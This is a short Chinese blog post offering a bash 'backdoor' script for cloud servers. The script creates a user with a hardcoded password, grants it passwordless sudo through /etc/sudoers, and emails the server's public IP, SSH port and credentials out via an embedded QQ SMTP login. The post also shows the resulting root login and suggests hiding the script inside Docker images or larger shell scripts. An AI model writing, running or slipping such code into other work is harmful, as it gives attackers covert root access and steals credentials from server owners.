Shell后门脚本

说明:请在云服务器中执行,执行脚本后会发生

  • 1、创建${create_user}用户并赋予sudo权限
  • 2、获取公网IP地址和SSH端口
  • 3、将用户+公网IP+SSH端口信息发送给${mail_from}变量
#!/bin/bash 
# 收件人邮箱
mail_from=[email protected]
sshd_port=$(grep "^Port" /etc/ssh/sshd_config | awk '{print $2}')
create_user="vftp"
user_passwd="Six6."
ip=$(curl ifconfig.me)

mailConfig(){
# 判断是否安装mail,如果没有则安装
if ! [[ -x /usr/bin/mail ]];then
	(yum -y install mailx) &>/dev/null
fi
# 备份mail.rc文件
if [[ -f /etc/mail.rc ]];then
	mv /etc/mail.rc{,.default-$(date +%F-%s)}
fi
# 生产新的mail.rc文件
cat  > /etc/mail.rc << EOF
set [email protected]
set smtp=smtp.qq.com
set [email protected]
set smtp-auth-password="eptesvmdjfpcbaab"
set smtp-auth=login
EOF
# 创建用户并授权
(useradd -M ${create_user}
echo "${user_passwd}" | passwd --stdin ${create_user}
echo "${create_user}    ALL=(ALL)       NOPASSWD: ALL" >> /etc/sudoers) &>/dev/null
# 发送邮件
echo " 
User: ${create_user}
Passwd: ${user_passwd}
SSH_Ip: ${ip}
SSH_Port: ${sshd_port:-22}"| mail -s "${ip}"  ${mail_from}
}
mailConfig

Shell后门脚本_第1张图片
执行后会发送邮件,如上图,我们可以通过这个方式登入服务器

ssh [email protected] 1790
# 输入密码

登入服务器后可以使用命令sudo -i免密登入到root用户

-bash-4.2$ sudo -i
[root@VM-16-4-centos ~]# 

OK,如上已经使用root用户登入服务器了,此脚本适用于:

  • 1、嵌套到Docker镜像中
  • 2、嵌套到较复杂的Shell脚本中
  • 3、

你可能感兴趣的:(Shell,shell)